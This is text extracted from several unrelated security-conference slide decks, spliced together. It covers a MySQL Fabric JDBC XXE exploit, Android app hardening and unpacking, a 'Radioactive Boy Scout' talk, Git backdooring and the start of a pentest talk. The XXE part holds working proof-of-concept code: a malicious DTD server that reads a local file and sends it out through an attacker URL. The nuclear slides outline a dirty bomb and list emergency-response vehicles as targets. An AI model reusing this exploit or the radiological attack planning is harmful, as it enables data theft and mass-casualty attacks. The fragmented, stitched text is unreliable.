return super.parseURL(url.replaceAll("fabric:", ""), defaults);
}
1
2
3
4
5
6
7
8
9
10
11
customize fabric protocol
send a XMLRPC request to host
try {
String url = this.fabricProtocol + "://" + this.host + ":" + this.port;
this.fabricConnection = new FabricConnection(url, this.fabricUsername, this.fabricPassword
} catch (FabricCommunicationException ex) {
throw SQLError.createSQLException("Unable to establish connection to the Fabric
server", SQLError.SQL_STATE_CONNECTION_REJECTED, ex, getExceptionInterceptor(), this);
}
public FabricConnection(String url, String username, String password) throw
FabricCommunicationException {
this.client = new XmlRpcClient(url, username, password);
refreshState();
}
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
call XMLRPC request automatically after JDBC Connection
Seems like a SSRF request?
public FabricConnection(String url, String username, String password) throws FabricCommunicationException {
this.client = new XmlRpcClient(url, username, password);
refreshState();
}
. . . . . .
public int refreshState() throws FabricCommunicationException {
FabricStateResponse<Set<ServerGroup>> serverGroups = this.client.getServerGroups();
FabricStateResponse<Set<ShardMapping>> shardMappings = this.client.getShardMappings();
this.serverGroupsExpiration = serverGroups.getExpireTimeMillis();
this.serverGroupsTtl = serverGroups.getTtl();
for (ServerGroup g : serverGroups.getData()) {
this.serverGroupsByName.put(g.getName(), g);
}
. . . . . .
public FabricStateResponse<Set<ServerGroup>> getServerGroups(String groupPattern) throws FabricCommunicationException {
int version = 0; // necessary but unused
Response response = errorSafeCallMethod(METHOD_DUMP_SERVERS, new Object[] { version, groupPattern });
// collect all servers by group name
Map<String, Set<Server>> serversByGroupName = new HashMap<String, Set<Server>>();
. . . . . .
private Response errorSafeCallMethod(String methodName, Object args[]) throws FabricCommunicationException {
List<?> responseData = this.methodCaller.call(methodName, args);
Response response = new Response(responseData);
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
set evil JDBC URL
porcess XML external entity
initiate XMLRPC request
Server
Attacker
retrieve data in response
Find XXE vulnerability in processing response data
OutputStream os = connection.getOutputStream();
os.write(out.getBytes());
os.flush();
os.close();
// Get Response
InputStream is = connection.getInputStream();
SAXParserFactory factory = SAXParserFactory.newInstance();
SAXParser parser = factory.newSAXParser();
ResponseParser saxp = new ResponseParser();
parser.parse(is, saxp);
is.close();
MethodResponse resp = saxp.getMethodResponse();
if (resp.getFault() != null) {
throw new MySQLFabricException(resp.getFault());
}
return resp;
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
XXE attack without any properties
import java.sql.Connection;
import java.sql.DriverManager;
public class MysqlTest{
public static void main(String[] args) throws Exception{
String url = "jdbc:mysql:fabric://127.0.0.1:5000";
Connection conn = DriverManager.getConnection(url);
}
}
from flask import Flask
app = Flask(__name__)
@app.route('/xxe.dtd', methods=['GET', 'POST'])
def xxe_oob():
return '''<!ENTITY % aaaa SYSTEM "fiLe:///tmp/data">
<!ENTITY % demo "<!ENTITY bbbb SYSTEM
'http://127,0.0.1:5000/xxe?data=%aaaa;'>"> %demo;'''
@app.route('/', methods=['GET', 'POST’])
def dtd():
return '''<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE ANY [
<!ENTITY % xd SYSTEM "http://127.0.0.1:5000/xxe.dtd"> %xd;]>
<root>&bbbb;</root>'''
if __name__ == '__main__'
app.run()
XXE attack without any properties | pdf |
Your site here
LOGO
移动APP风险防护与安全测评
Android平台
Your site here
LOGO
移动APP风险防护
前言
APP面临的安全威胁
APP加固
APP原理
APP反编译保护
APP反汇编保护
APP防篡改保护
APP防调试与注入保护
APP脱壳攻击测试
Your site here
LOGO
前言
Android开发者常常面临的一个问题就是防破解、
防二次打包。现如今,安全问题越来越重要,越来越多
的Android开发者也开始寻求安全的保护方案。
Your site here
LOGO
APP面临的安全威胁
盗版、数据篡改、山寨
Your site here
LOGO
APP面临的安全威胁 – 盗版
代码修改(广告植入、移除)
资源修改(界面替换广告页面、链接篡改)
破解(解除应用付费)
篡改应用数据(游戏金币篡改)
挂马、添加恶意代码以及病毒(隐私窃取、交易篡改
等)
Your site here
LOGO
APP面临的安全威胁 – 数据篡改
动态注入:数据监听、拦截、窃取、修改
本地数据修改、数据库文件修改
服务器欺骗、向服务器发送假数据
Your site here
LOGO
APP面临的安全威胁 – 山寨
应用名称复制或模仿
应用图标复制或模仿
应用内容复制或模仿
Your site here
LOGO
APP风险防护技术 – 加固
为了加强APP安全性,越来越多的开发者选择APP加固方案对
APP进行加固保护来防止二次打包(盗版)、数据篡改等风险
APP加固基本服务:
防止逆向分析
加密app代码,阻止反编译
防止二次打包
对app完整性校验保护,防止盗版
防止调试及注入
阻止动态调试注入,防止外挂、木马窃取账号密码,修改交易金额等
防止应用数据窃取
加密应用敏感数据,防止泄漏
防止木马病毒
监测设备环境,防止木马、病毒、恶意应用或钓鱼攻击
Your site here
LOGO
APP加固厂商介绍
目前国内App加固厂商较多,其中以专业从事加固为主打产品
的厂商有:爱加密、娜迦(nagain) 、梆梆、通付盾等
Your site here
LOGO
APP加固技术原理以及发展现状
目前加固技术主要分为一代和二代
一代(1.0)加固方案
1.0的方案是基于类加载的技术,原理:对classes.dex文件进
行完整加密,另存为文件放入资源文件中,通过壳代码(壳dex)进
行载入并解密运行
二代(2.0)加固方案
2.0的方案是基于方法替换方式,原理:将原dex中的所有方法
的代码提取出来进行加密,运行时动态劫持Dalvik虚拟机中解析
方法的代码,将解密后的代码交给虚拟机执行引擎
Your site here
LOGO
各厂商APP加固技术
加固技术
加固原理
加固厂商
类加载技术
(1.0)
对原classes.dex文件进行完整加
密,另存为文件放入资源文件中,
通过壳代码(壳dex)进行载入并解
密运行
娜迦、爱加
密、梆梆、
网秦等
对原dex文件整体压缩加密,保存
在壳代理的dex文件尾部,加载到
内存中解密运行
360
方法替换技
术(2.0)
将原classes.dex中的所有方法的
代码提取出来,单独加密,运行时动
态劫持Dalvik虚拟机中解析方法的
代码,将解密后的代码交给虚拟机
执行引擎
娜迦、梆梆
Your site here
LOGO
各厂商APP加固识别
各加固厂商采用的加固保护核心库大致如下(存放在lib目录或
assets目录)
加固厂商
加固保护核心库
娜迦
1.0(libchaosvmp.so)、2.0(libddog.so、libfdog.so)
爱加密
libexec.so、libexecmain.so
梆梆
1.0(libsecexe.so、libsecmain.so)2.0(libDexHelper.so)
360
libprotectClass.so、libjiagu.so
通付盾
libegis.so
网秦
libnqshield.so
百度
libbaiduprotect.so
腾讯
libtup.so
阿里
libmobisec.so
Your site here
LOGO
APP加固必要性
Android平台应用采用Java语言进行开发,由于
Java语言很容易被反编译,反编译后的代码接近源代
码的级别,易读性极高。容易暴露客户端的所有逻辑,
比如与服务端的通讯方式,加解密算法、密钥,转账业
务流程、软键盘技术实现等等。 因此很有必要对Java
代码进行加密保护,即采用加固方案。
Your site here
LOGO
APP加固 – 反编译保护
JAVA层保护
Android平台采用使用Java作为原生语言进行开发。在最终的安装包中,
所有的java代码编译并打包到APK中的classes.dex文件中,java代码的
保护的目标就是classes.dex。
1.0类加载加固技术原理
对原classes.dex文件进行完整加密,另存为文件放入资源文件中,通过
壳代码(壳dex)进行载入并解密运行
2.0方法替换加固技术原理
将原classes.dex中的所有方法的代码提取出来,单独加密,运行时动态
劫持Dalvik虚拟机中解析方法的代码,将解密后的代码交给虚拟机执行引
擎
实例:某加固应用
反编译工具:dex2jar(ApkToolkit) jd-gui 等
反编译结果:无法获取到原dex代码或完整的dex代码
Your site here
LOGO
APP加固 – 反编译保护案例
Your site here
LOGO
APP加固 – 反汇编保护一
Native层保护
SO库是采用C/C++语言开发的动态库。SO库的逆向要求攻击者需
要有一定的汇编语言基础,相比Java的反编译,逆向分析的难度更高。
反汇编原理:
SO库的加密保护技术与PC领域的加壳技术类似。加壳技术是指利用
特殊的算法,将可执行程序文件或动态链接库文件的编码进行改变,以达
到加密程序编码的目的, 阻止反汇编工具如IDA等的逆向分析
So加壳技术,
对SO库中的汇编代码加密保护
ELF数据信息的隐藏
对SO库中的动态定位信息,函数地址信息,符号表等ELF数据信息做
清除隐射隐藏保护。
Your site here
LOGO
APP加固 – 反汇编保护二
So文件的整体加密
使用自定义链接器的技术,对SO文件进行整体的加密,完全阻止
IDA等逆向工具的静态分析。
代码运行态动态清除
解密代码动态清除的技术,防止运行时内存存在完整的解密后代码。
AOP技术
自实现linker、自定义so文件格式,完全阻止IDA等反汇编工具与内
存dump。
实例:某加固应用
So反汇编工具:IDA
反汇编方法:使用IDA打开SO库文件,查看反汇编arm汇编代码
反汇编结果:无法正常分析
Your site here
LOGO
APP加固 – 反汇编之AOP技术
So采用AOP技术加壳后,已不是一个正常的ELF格式文件,如下图,
IDA无法反汇编分析,也无法采用内存dump方式进行脱壳
Your site here
LOGO
APP加固 – 防篡改保护
客户端篡改是指对App添加或修改代码,修改资源文件,配置信息,
图标等,重新编译签名为新的APP,可能添加病毒代码、广告SDk,推广
自己的产品;添加恶意代码窃取登录账号密码、支付密码、拦截验证码短
信,修改转账目标账号、金额等等。
防篡改原理:
App加固保护后,对加固后的安装包的任何修改,包括代码,资源文
件,配置文件等,运行时非法篡改的客户端将被检测到并终止运行。
防篡改的技术原理是采用完整性校验技术对安装包自身进行校验,校
验的对象包括原包中所有文件(代码、资源文件、配置文件等),一旦校验
失败,即认为客户端为非法客户端并阻止运行。
实例:某加固应用
APK篡改工具:APK改之理,AndrlidKiller
防篡改结果:篡改后无法正常运行
Your site here
LOGO
APP加固 – 反动态调试保护
动态调试攻击指攻击者利用调试器跟踪目标程序运行,查看、修改内
存代码和数据,分析程序逻辑,进行攻击和破解等行为。对于各行业应用
客户端,该风险可修改客户端业务操作时的数据,比如账号、金额等。逆
向分析用户敏感数据,如登录密码、交易密码等
反调试保护原理:
阻止附加调试
通过双向ptrace保护技术,阻止其他进程对本进程进行ptrace操作
进程调试状态检查
通过轮询方式,检测进程的状态是否处于调试状态
信号处理机制
利用Linux信号机制,检测进程的状态是否处于调试状态
实例:某加固应用
动态调试工具:IDA
动态调试方法:附加应用进程调试, 调试模式启动进程
调试结果:无法正常动态调试
Your site here
LOGO
APP加固 – 反动态注入保护
由于Android平台没有禁止用于调试的 ptrace 系统调用, 恶意程序
在拿到root权限的情况下, 可以使用这个 API 对目标进程的内存、寄存器
进行修改,以达到执行 shellcode、注入恶意模块的目的。在注入恶意模
块后,恶意模块就可以动态地获取内存中的各种敏感信息,例如用户的用
户名、密码等。
反注入原理:
阻止ptrace注入行为
通过双向ptrace保护技术,阻止其他注入行为对本进程进行注入操作
实例: 某加固应用
注入工具:inject libhooktest.so
注入方法:获取目标进程名,编译inject , push注入工具至手机或
模拟器,赋于inject执行权限,运行
注入结果:无法注入
Your site here
LOGO
APP加固 – 脱壳攻击测试
目前加固技术已日渐成熟,市面上的反编译工具,脱壳工具基本被屏
蔽,对于当前各厂商加固脱壳攻击只能通过人工逆向分析,突破反调试等
防护,截获原始dex代码
以某应用为例,进行脱壳攻击测试:
某加固应用1:以调试模式启动加固后的程序,下断点于SO代码解密
函数,解密jni_onload函数后,对其下断点,最后下断点于mmap函数
, dump解密后的原始dex
某加固应用2:以调试模式启动加固后的程序,下断点于fgets函数,
以逆推方法找出判断反调试关键点,对其暴力修改返回值,下断dvmdex
函数, dump解密后准备加载的原始dex
Your site here
LOGO
APP加固 – 脱壳攻击测试案例
Your site here
LOGO
APP加固的疑惑?
App采用加固(加壳)的最终目的是为了防止盗版、反编译、动
态调试以及恶意注入行为等,但经过脱壳攻击测试后也可证明,加
固后仍有被脱壳的风险,可能这个时候大家可能就有疑惑了,还有
必要进行加固吗?答案是肯定的,我们举个例子:我们的房子都会安
装防盗门,但全世界几乎每天都会有一些家庭失窃,但人们并没有
因为安装了防盗门还被小偷偷了东西,从此放弃安装防盗门,加固
其实就好比防盗门,并不能百分百保证不被脱壳,当然加固技术也
在不断的提高和更新,我们需要选择一款安全性高的加固产品.
Your site here
LOGO
移动APP安全测评
App安全测评项主要分为以下十项:
终端能力调用安全
终端资源访问安全
通信安全
键盘输入安全
Activity组件安全
反逆向安全
反调试反注入能力
反盗版能力
敏感信息安全
认证因素安全
Your site here
LOGO
移动APP安全测评工具及使用
检测项
工具
反编译
Dex2jar、jd-gui、apktool
反汇编与调试
IDA pro、Android_server
二次打包
Apk改之理、Androidkiller
签名(APKSign、上上签)
通信数据分析
Tcpdump、Fiddler
十六进制
WinHex、Ultraedit
进程注入与hook
inject、hook
页面劫持
hijack
敏感信息与本地数据
DDMS、Root Explorer、
数据库(SQLite Developer)
截屏
Screencap
脱壳
Gdb、ZjDroid
Your site here
LOGO
IDA调试之附加调试
前提:
1. 调试目标进程不具备防调试机制;
2. 设备(手机)需ROOT权限。
调试步骤:
① 把IDA目录下的android_server push到手机目录,如:data目录,
android_server可改名
② Push失败时,可对data目录进行写操作(chmod 777 data)
③ Push成功后,对android_server赋于执行权限(chmod 777
android_server)
④ 端口转发(adb forward tcp:23946 tcp:23946)
⑤ 启动IDA—选择菜单Debugger—Attach—RemoteArmLinux—
AndroidDebugger
⑥ 写入参数Hostname=localhost,Port=23946
⑦ 选择目标进程名,进行附加调试
Your site here
LOGO
IDA调试之启动调试
前提:
1. ro.debuggable值=1(可用adb shell getprop ro.debuggable查看);
2. 设备(手机)需ROOT权限。
调试步骤:
① 把IDA目录下的android_server push到手机目录,如:data目录,
android_server可改名
② Push失败时,可对data目录进行写操作(chmod 777 data)
③ Push成功后,对android_server赋于执行权限(chmod 777
android_server)
④ 端口转发(adb forward tcp:23946 tcp:23946)
⑤ 反编译APP(应用程序)启动页面(可用反编译工具查看)并启动该页面,如
adb shell am start –D –n 包名/页面
⑥ 开启DDMS
⑦ 启动IDA—选择菜单Debugger—Attach—RemoteArmLinux—
AndroidDebugger
⑧ 写入参数Hostname=localhost,Port=23946
⑨ 选择目标进程名,进行附加调试
Your site here
LOGO
IDA调试之dex调试
前提:
1. ro.debuggable值=1(可用adb shell getprop ro.debuggable查看);
2. 设备(手机)需ROOT权限。
调试步骤:
① 首先把apk安装到手机
② 在电脑端把apk解压,用IDA打开解压后的classes.dex文件并完成分析(The in
itial autoanalysis has been finished.),
③ 选择需要调试的断点进行F2下断,如下断在. MainActivity.onCreate
④ 选择Debugger菜单下的Debugger options…里面的Set specific options选
择
⑤ 设置adb路径,填写apk的package name和Acitivty,最后F9运行.正常的话断
在刚下的断点处.
Your site here
LOGO
APP安全 – 终端能力调用安全检测
终端能力调用包括短信、彩信、通话、邮件、录音
、截屏、摄像头以及推送等
Android提供了丰富的SDK,开发人员可以根据开发Android
中的应用程序。而应用程序对Android系统资源的访问需要有相应
的访问权限,应用程序要想使用某种权限就必须进行明确申请,这
种开放性一方面为开发带来了便利,另一方面权限的滥用也会产生
很大的隐患,可能造成私人信息的泄漏等风险,如一款游戏app具
有通讯录访问权限
Your site here
LOGO
APP安全 – 终端能力调用安全检测
Sms短信拦截部分代码
Your site here
LOGO
APP安全 – 终端资源访问安全检测
终端资源主要包括通讯录、通话记录、位置信息、
终端基本信息、应用信息、系统权限、用户文件、收藏
夹、快捷方式、系统设置、系统资源以及无线外围接口
等
GPS位置获取部分代码
Your site here
LOGO
APP安全 – 通信安全一
App通信安全,主要是指客户端与服务器通信过程中,采用的
什么协议,如:http简单加密、http安全加密、https加密,其中
,http简单加密容易被劫持或破解;当采用https协议,是否对服
务器证书进行校验,是否可导致中间人攻击风险。
上图引自红黑联盟网对于中间人攻击的基本原理图:由于客户端没有对服务端的证书进行验证,也就是没
有验证与其通信的服务端的身份,即客户端默认信任所有的服务端。利用这种信任,mitmproxy作为一个中
间人,中转了SSL/TLS的握手过程。所以实际上,与客户端通信的并不是服务端而是mitmproxy。
mitmproxy知道用于通信加密的对称密钥,可以对HTTPS的通信数据进行窃听:mitmproxy将自己的证书提
供给客户端,而客户端在不进行校验的情况下,信任并使用此证书对要传输的数据进行加密,之后再传给
mitmproxy。
Your site here
LOGO
APP安全 – 通信安全二
中间人攻击实例:
可通过Fiddler工具来模拟服务器与客户端进行通信,如果客
户端对服务器证书进行校验的话,模拟过程将会失败;但如果客户
端没有对服务器证书进行校验的话,模拟服务器过程就能通过。
Your site here
LOGO
APP安全 – 密码安全
以手机银行例,大多数银行采用自绘键盘代替系统键盘,防止
了系统键盘监听行为,但有些开发者忽略了截屏保护,以用户体验
来看,按下密码后会有”阴影”效果,能够使用截屏功能截获该密码
,如下图中通过截屏截获的密码
Your site here
LOGO
APP安全 – 组件安全
有部分应用未对自身进程处于后台运行时提醒客户,可导致页
面钓鱼攻击风险,窃取用户敏感信息
Your site here
LOGO
APP安全 – 反逆向安全一
逆向分析主要为dex是否能够反编译分析与so能够反汇编分析
,未加固app一般对dex采用代码混淆,而加固app目前大多使用
dex整体加密或方法代码抽取加密两种。
Your site here
LOGO
APP安全 – 反逆向安全二
so则采用代码加密以及AOP技术。从静态的角度来看,加固
app均无法进行反编译与反汇编分析。
Your site here
LOGO
APP安全 – 反调试反注入安全
大部分app开发者,通常情况下不会对app增加反调试反注入
防护功能,因此app具有被逆向分析、注入拦截、数据篡改、敏感
信息截获等风险。
当app采用加固方案,应当检测该app是否能够防止以ptrace
注入行为,检测加固后的app是否能够提高攻击者分析hook关键
点难度。
Your site here
LOGO
APP安全 – 反盗版安全
大部分app开发者,通常情况下不会对app增加反盗版防护能
力,也有少数app采用了简单的反盗版防护,如在java层校验app
完整性或在c层校验app完整性,由于app并未具备反编译防护能
力或反汇编防护能力,因此简单的校验强度较弱,不能够保护app
二次打包风险。这就需要采用专业的app加固方案。
Your site here
LOGO
APP安全 – 敏感信息安全一
由于开发者的疏忽,具有敏感信息的调试信息开关忘记关闭,
导致发布版本应用造成敏感信息泄漏风险
Your site here
LOGO
APP安全 – 敏感信息安全二
少数应用对存储于本地的敏感数据未进行加密保存,可导致本
地敏感数据泄漏
Your site here
LOGO
APP安全 – 敏感信息安全三
一款未加固的APP,毫无疑问风险相当大,以手机银行app为例
,轻易截获用户敏感信息(登录密码)
目前大多数手机银行app密码类敏感信息采用了C层加密处理
,常规风险:处理密码so库命名暴露了自身模块功能,同样的,密
码加密函数命名暴露了自身的功能,通过这两点可轻易分析并截获
密码明文
实例:
分析工具:IDA
攻击方法:分析密码加密SO库以及加密函数,进行动态调试并
验证
Your site here
LOGO
APP安全 – 密码风险案例
案例一:
Your site here
LOGO
APP安全 – 密码风险案例
案例二:
Your site here
LOGO
APP安全 – 密码风险案例
案例三:
Your site here
LOGO
APP安全 – 认证因素安全
双因素认证安全性取决于两个认证信息之间的独立性,越是相
互独立的越不容易被攻击截获。当我们使用pc网银时,验证信息
发往移动设备,这样就增加了攻击者截获的难度,使用U盾、动态
口令等设备都能满足双因素谁安全。
伪双因素认证存在于移动设备中,如用户在使用手机银行进行
支付操作时,该手机设备同时需要接收验证信息,这样就限制了短
信信息的独立性。
Your site here
LOGO
APP安全 – 其它风险
由于每款app功能不一致,故风险也各有不同,除上述十项风
险以外,还会有其它一些风险问题,如业务风险、登录无限制、登
录数据重放、验证码重复使用、短信验证码随通信数据下发至客户
端、转账交易数据劫持等。
Your site here
LOGO
Thank you !
交流Q群:383345594 | pdf |
THE RADIOACTIVE BOY
SCOUT:
NOW EVERYONE CAN GET
INTO THE NUCLEAR ARMS
RACE
WHAT IS A HACKER
• SOMEONE VERY CREATIVE
• AN EXPLORER
• REVERSE ENGINEER
• SOMEONE WHO DOES’T HAVE A BOX
TO THINK OUT OF
• DOESN’T DRINK THE KOOLAIDE
• BOLDLY GOES WHERE NO MAN HAS
GONE BEFORE
RADIATION, GAMMA RAYS
• HIGH ENERGY PHOTONS
• CESIUM 137
• COBALT 60
NEUTRONS
• PRODUCED BY A REACTOR
• NO CHARGE
• CAN MAKE ELEMENTS RADIOACTIVE
RADIATION,ALPHA,BETA,
PARTICLES
• ALPHA PARTICLES, HELIUM NUCLEUS
+2 CHARGE
• BETA PARTICLES, ELECTRON ,-1
CHARGE
• ONLY DANGEROUS IF INHALED OR
INGESTED
ATTACKS IN THE PAST THAT
COULD HAVE UTILIZED
• RUSSIAN POLONIUM 210 INGESTION
• IN 1984 THE FOLLOWERS OF
BHAGWAN SHREE RAJNEESH
SPRAYED SALMONELLA INTO SALAD
BARS IN ANTELOPE COUNTRY
• IN 1966-7 THE CIA AND DEFENSE
DEPT SPRAYED A HARMLESS
SUBSTANCE ON TO THE TRACKS OF
TWO NYC SUBWAY LINES
PASITIVE DETECTORS
• GEIGER COUNTER
• ION CHAMBER SURVEY
• GAMMA SCINTILLATION DETECTOR
• COUNTER MEASURES
ACTIVE DETECTORS
• ILUMINATE OBJECTS WITH
NEUTRONS OR GAMMA RAYS
• NUCLEAR INTERESTING OBJECT WILL
PRODUCE NEUTRONS
• COUNTER MEASSURES NONE
• DRAWBACKS, IT MIGHT SET OFF A
CRUDLEY MADE ATOM BOMB
OVER VIEW OF DAVID HAHN
• LIVES IN A SUBURB OF DETROIT
• BOY SCOUT,ATOMIC ENERGY MERIT
BADGE
SOCIAL ENGINEER
• PROFESSOR HAHN
• CZECH REPUBLIC,SAMPLES
URANINITE AND PITCHBLEND
• PROFESSOR PHYSICS INSTRUCTOR
CON SOME GOVERNMENT OFFICALS
• RECEIVED A REPLY FROM ONE OUT
OF 5 LETTERS
• LEARNED FROM GOVERNMENT
BERYLLIUM PRODUCES NEUTRONS
DAVID HAHN THE CHEMIST
• GOLDEN BOOK OF CHEMISTRY
EXPERIMENTS
• GUN POWER
• NITRIC ACID
• YELLOW CAKE
THE QUEST FOR FISSIONABLE
FUEL
• URANIUM-235,233,PLUTONIUM-239,240
• THORIUM-232 BECOMES 233 +
NEUTRON
• LANTERN MANTELS CONTAIN
THORIUM
• COPIOUS AMOUNT OF MANTELS
THE NEUTRON GUN
• A DEVICE TO TRANSFORM ELEMENTS
• ALPHA PARTICLES FIRED AT
ALUMINUM OR BERYLLIUM PRODUCE
NEUTRONS
• AMERICIUM 241 FOUND IN SMOKE
DETECTORS PRODUCES ALPHA
PARTICLES
• NEED AT LEAST 100 DETECTORS
NEUTRON GUN 2
• RADIUM- USED AS A PAINT ON CLOCK
FACES
REACTOR START UP
• NEUTRON GUN BECOMES CORE OF
THE REACTOR
• TINY FOIL WRAPPEDCUBES
CONTAINING THORIUM
• CUBES CONTAINING CARBON
• OUTER LAYER OF THORIUM
• SHOE BOX SIZE ABOUT 4500 GRAMS
SCRAM
• NO CONTROL RODS
• GETTING MORE RADIOACTIVE DAY
BY DAY
• DETECTING RADIATION FROM FIVE
HOUSES DOWN
• PUT MOST OF THE REACTOR PARTS
IN A TOOLBOX
DAVID’S DEVICE VS THE NAZI
URANIUM ENGINER
• NO CONTROL RODS
• RADIATION BUILDS UP SLOWLY
• MUST BE DISASEMBLED TO STOP
• CAN EXPLODED FROM PRESSURE
BUILD UP
WHAT I THINK
• 3-5 WORLD WIDE HOBBYIST, MAYBE,
30-50 AFTER I FINISH THIS TALK
• NOT POLITICAL
• 1000 TO 1, 1,000,000 TO 1,
IMPROVEMENT CAN BE
REENGINEER BY HIS DESIGN
WHAT WE DON’T KNOW
• NEUTRON FLUX
• GAMMER RAY VALUE
• ALL HIS NOTE BOOKS WERE BURNED
WHAT WE KNOW
• THE EPA DIDN’T GET THE GOOD
STUFF
• THE GARBAGE GOT THE
RADIOACTIVE GOOD STUFF
HOMELAND SECURITY MODEL
• COBALT 60, CESIUM 137
• PENCIL
• HIGH EXPLOSIVE
• MAYBE THIS IS A DISINFORMATION
MODEL
• COULD HOMELAND SECURITY BE
SMARTER THAN WE THINK
NUCLEAR HACKER BECOMES A
TERRORIST
• WHAT TO DO WITH A HOT
RADIOACTIVE SOURCE COBALT
60,CESIUM 137
SEED CORN TO MAKE OTHER
THINGS RADIOACTIVE
• NANO SIZE
• 1-100NM,
• HUMAN HAIR80,000 – 90,000NM
• RED BLOOD CELL 7,000NM
• PASS HEPA FILTER
• INERT COMPOUNDS MAY BE TOXIC
AT THE NANO SIZE LEVEL
BUILD THE PERFECT DIRTY
BOMB
• NANO SIZE
• NRC TOOLBOX
• MULTIPE BOMBS OF DIFFERENT SIZES
• ONLY BLACK POWDER IS NEEDED
STRATEGIC TARGETS
• FIRE DEPT HAZMAT TRUCK
• DECON SHOWER TRUCKS
• HAZ-MAT 1
• NYPD HAZMAT AT ESU base (Floyd
Bennett Field )
WHAT CAN SET OFF A
RADIATION ALARM
• URAINUM MINERALS
• RADIOLOGICAL
PROCDURES,SPECT,PET SCAN
• RADIOACTIVE DRUGS
• RADIO SEEDS
MY RADIATION ALARM GOES
OFF ON THE A TRAIN
• 911 CALL
• NYC INFORMATION HOT LINE THEY
DON’T KNOW THE WORD “RADIATION”
• CALL TO NYPD TERRORIST HOT LINE
WHAT THEY DIDN’T ASK ON
THE HOT LINE
• DETECTOR SATURATION
• HIGHEST READING
• NEAR FOOD STUFFS
WHAT I HAVE OBSERVED
• IN THE PAST 22 MONTHS ALL
HOT(10,000 CPS) URANIUM MINERALS
HAVE DISAPEARED FROM THE
MARKET
NOW IT GET REALLY SCARY
• NEXT SLIDE IF YOU CAN TAKE IT
9/11 DISINFORMATION
• THE GOVERNMENT TOLD RESCUERS
IT WAS SAFE AT GROUND ZERO
• WHAT HAPPENS IF A TERRORIST
BOMBS A VERY CRITICAL LOCATION.
• THE GOVERMENT SAYS IT IS SAFE
• THE MEDIA SAVVY TERRORIST SAY IT
ISN’T
THE 10 KILOTON BOMB
WITH SALT HOLD THE PEPER
• COBALT 60, 5.27 YRS
• CESIUM 137, 30.2 YRS
• ZINC 65, 244 DAYS | pdf |
John Menerick − August 2015
Backdooring Git
‹#›
Legal Disclaimer
‹#›
Thank you for coming
‹#›
What we are covering
‹#›
What we are not covering
‹#›
What we are not covering
‹#›
Software is like sex; it is better when it is free
Linus Torvalds
Name the Quote
Setting the Stage
‹#›
Good luck!
‹#›
Revision control vs. Source Control
Source control == source code change management
‹#›
Wrong Tool for the Job
‹#›
Right Tool for the Job
‹#›
Distributed vs. Centralized
‹#›
Helfe!
‹#›
Trends
Git
‹#›
Definition
1
While it works, angel sings and light shines from above - “Global information tracker”
‹#›
Definition
2
When it dies, fire erupts from under your feet - “Goddamn idiot truckload of sh*t”
‹#›
Hitler Uses Git
‹#›
Rings of Trust
‹#›
If you have ever done any security work - and
it did not involve the concept of “network of
trust” - it wasn’t security work, it was - <insert
word my mother would not approve me
stating>. I don’t know what you were doing.
But trust me, it’s the only way you can do
security. it’s the only way you can do
development.
Linus Torvalds
Name the Quote
‹#›
Typical Trust Relationships
‹#›
Morons
Since you do not want everybody to write to the central repository
because most people are morons, you create this class of people
who are ostensibly not morons. And most of the time what
happens is that you make that class too small, because it is really
hard to know if a person is smart or not, and even if you make it
too small, you will have problems. So this whole commit access
issue, which some companies are able to ignore by just giving
everybody commit access, is a huge psychological barrier and
causes endless hours of politics in most open source projects
Empircal Study
‹#›
SVN
‹#›
Git
‹#›
Not Scientific CVE Search
‹#›
GitLab
‹#›
GitLab 0day
‹#›
Functionality or Backdoor?
‹#›
2003 Linux backdoor
‹#›
2003 Linux backdoor
‹#›
2003 Linux backdoor
‹#›
Old School Cloud Repository Hacks
‹#›
New School Cloud Repository Hacks
‹#›
New School Cloud Repository Hacks
‹#›
New School Cloud Repository Hacks
‹#›
New School Cloud Repository Hacks
‹#›
New School Cloud Repository Hacks
Story Time
‹#›
Sit back and relax
‹#›
Corruption
‹#›
It wasn’t me
‹#›
It wasn’t me
‹#›
It wasn’t me
‹#›
Feelings
‹#›
Trust
‹#›
Crypto to the rescue
‹#›
Crypto to the rescue
‹#›
My voice is my passport – Verify me
‹#›
GPG Trust Model
‹#›
GPG Trust Model
‹#›
Embedded Signatures
‹#›
No More Than One Signature Per Commit
‹#›
Backdooring
‹#›
Simple Scenario
* User "Alice" clones the canonical repo so they can work on a bugfix. They branch
locally, and then push their local branch to a branch on a public repository somewhere.
* User "Alice" does not have direct commit access to the canonical repository, so they
contact a committer, "Bob". "Bob" adds a remote in his working copy pointing to Alice's
remote; after review of the changes, Bob merges the branch to their development
branch.
* Later, Bob pushes his development branch to the canonical repository.
The question that arises is: how do we know that Alice has signed a CLA? How does Bob
know that Alice has signed a CLA?
‹#›
Danger Zone
‹#›
Ambiguity
‹#›
Transitive Policy Checks
‹#›
Transitive Policy Checks
‹#›
Trust your peer?
trusting the pushing client's assertions as to the signature status is meaningless from a
security perspective.
Demo
Has this been seen in the wild?
‹#›
No?
from hashlib import sha1
def githash(data):
s = sha1()
s.update("blob %u\0" % len(data))
s.update(data)
return s.hexdigest()
‹#›
No?
“If all 6.5 billion humans on Earth were programming, and every second, each one was
producing code that was the equivalent of the entire Linux kernel history (3.6 million Git
objects) and pushing it into one enormous Git repository, it would take roughly 2 years
until that repository contained enough objects to have a 50% probability of a single
SHA-1 object collision.. A higher probability exists that every member of your
programming team will be attacked and killed by wolves in unrelated incidents on the
same night.”
‹#›
No?
‹#›
Yes?
https://github.com/bradfitz/gitbrute
‹#›
Yes?
‹#›
Yes?
‹#›
Yes?
‹#›
Signed commit metrics on the popular git services vs. not signed commits
Tools
‹#›
CLI
To a close
‹#›
One More Thing
‹#›
One More Thing
from RockStar import RockStar
activity = RockStar(days=4061)
activity.make_me_a_rockstar()
‹#›
One More Thing
from RockStar import RockStar
activity = RockStar(days=4061)
activity.make_me_a_rockstar() | pdf |
the pentest is dead,
long live the pentest!
Taylor Banks
& Carric
1
carric
2
taylor
3
44
Overview
1 the pentest is dead
1.1 history of the pentest
1.2 pentesting goes mainstream
2 long live the pentest
2.1 the value of the pentest
2.2 evolution of the pentest
2.3 a framework for repeatable testing
2.4 pentesting in the 21st century and beyond
conclusions
4
55
Taylor’s [Don’t Give Me Bad Reviews Because I Made Fun of You] Disclaimer:
I’m about to really rip on some folks, so I figure I might as well offer an explanation,
(and some semblance of an apology) in advance.
